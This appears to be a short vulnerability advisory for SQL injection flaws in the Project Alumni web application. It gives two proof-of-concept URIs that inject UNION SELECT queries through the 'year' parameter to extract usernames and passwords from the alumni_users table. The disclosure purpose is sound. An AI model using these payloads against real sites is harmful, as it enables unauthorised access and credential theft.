Project Alumni View and News Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

Project Alumni View and News Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
http://www.example.com/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1